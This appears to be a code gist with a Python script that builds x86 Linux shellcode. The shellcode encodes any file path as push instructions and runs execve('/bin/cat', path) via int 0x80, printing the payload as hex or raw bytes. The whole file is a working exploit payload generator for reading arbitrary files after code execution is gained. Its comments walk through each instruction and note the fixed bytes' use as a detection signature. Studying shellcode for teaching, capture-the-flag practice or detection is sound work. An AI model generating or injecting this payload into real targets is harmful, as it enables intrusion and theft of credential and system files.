@file-not-found
Created June 10, 2020 05:19
#!/usr/bin/env python3
from argparse import ArgumentParser
import sys
from binascii import hexlify
# Command-line interface: one positional file path, plus a switch that selects
# raw bytes on stdout instead of the default hex text.
parser = ArgumentParser()
parser.add_argument('path', help='path of file to read')
parser.add_argument(
    '-r', '--raw',
    action='store_true',
    default=False,
    help='print raw bytes',
)
args = parser.parse_args()
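# Pad the path so that its length is a multiple of 4. The loop further down
# embeds the path four characters at a time, so the string is lengthened with
# redundant path components ('/' and './') that leave the resolved file
# unchanged, rather than with filler bytes.
if not args.path:
    # An empty argument used to reach args.path[0] and abort with IndexError.
    parser.error('path must not be empty')
l = len(args.path)
absolute = args.path.startswith('/')
to_fill = (4 - (l % 4)) % 4  # characters missing to the next multiple of 4
out = b''  # accumulates the encoded path chunks
if to_fill != 0:
    if absolute:
        # Prefix '/', '/.' or '/./' in front of the existing leading '/'.
        # (An earlier "path = '/' + args.path" assignment that this branch
        # always overwrote was a dead store and has been dropped.)
        path = '/./'[:to_fill] + args.path
    else:
        if to_fill == 1:
            # Presumably no single character can be prepended to a relative
            # path without changing its meaning, so five are added instead.
            to_fill = 5
        # Prefix './', './/' or '././/': still relative, still the same file.
        path = '././'[:to_fill - 1] + '/' + args.path
else:
    # NOTE(review): rstrip() is applied only on this already-aligned branch.
    # If it strips anything, the length stops being a multiple of 4 and the
    # final chunk in the loop below is shorter than four characters. Confirm
    # whether trailing whitespace should be rejected up front instead.
    path = args.path.rstrip()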
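# Encode the path as a run of x86 `push imm32` instructions: opcode 0x68
# (the ASCII byte 'h') followed by four path characters. Chunks are taken from
# the end of the string first, so that after the pushes the text reads
# front-to-back in memory at the top of the stack.
while path:
    try:
        out += b'h' + path[-4:].encode("ascii")
    except UnicodeEncodeError:
        # Catch only the encoding failure; the previous bare `except` also
        # swallowed KeyboardInterrupt and SystemExit. The message goes to
        # stderr because stdout is the channel that carries the payload.
        print("ascii encode failed", file=sys.stderr)
        sys.exit(1)
    path = path[:-4]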
# Fixed instruction bytes placed before and after the encoded path. Decoded as
# 32-bit x86, they set up an execve of "/bin/cat" through the Linux int 0x80
# system-call gate. Both sequences are identical in every payload the script
# emits, which makes them usable as a static byte signature.
pre = b"".join((
    b"\x31\xc0",              # xor  eax, eax
    b"\x99",                  # cdq              (edx = 0)
    b"\x52",                  # push edx         (terminator for "/bin/cat")
    b"\x68\x2f\x63\x61\x74",  # push "/cat"
    b"\x68\x2f\x62\x69\x6e",  # push "/bin"
    b"\x89\xe3",              # mov  ebx, esp    (ebx -> "/bin/cat")
    b"\x52",                  # push edx         (terminator for the path)
))
post = b"".join((
    b"\x89\xe1",              # mov  ecx, esp    (ecx -> path string)
    b"\xb0\x0b",              # mov  al, 0x0b    (syscall 11: execve on i386)
    b"\x52",                  # push edx         (argv terminator)
    b"\x51",                  # push ecx         (argv[1] = path)
    b"\x53",                  # push ebx         (argv[0] = "/bin/cat")
    b"\x89\xe1",              # mov  ecx, esp    (ecx -> argv)
    b"\xcd\x80",              # int  0x80
))
# Assemble prologue + encoded path + epilogue, then emit it either as a hex
# string (default) or as raw bytes on the binary stdout stream (--raw).
payload = b"".join((pre, out, post))
if not args.raw:
    print(str(hexlify(payload), "ascii"))
else:
    sys.stdout.buffer.write(payload)